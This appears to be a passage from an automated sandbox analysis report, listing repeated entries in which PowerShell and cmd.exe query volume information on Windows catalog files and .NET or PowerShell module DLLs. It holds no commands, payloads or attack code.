    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
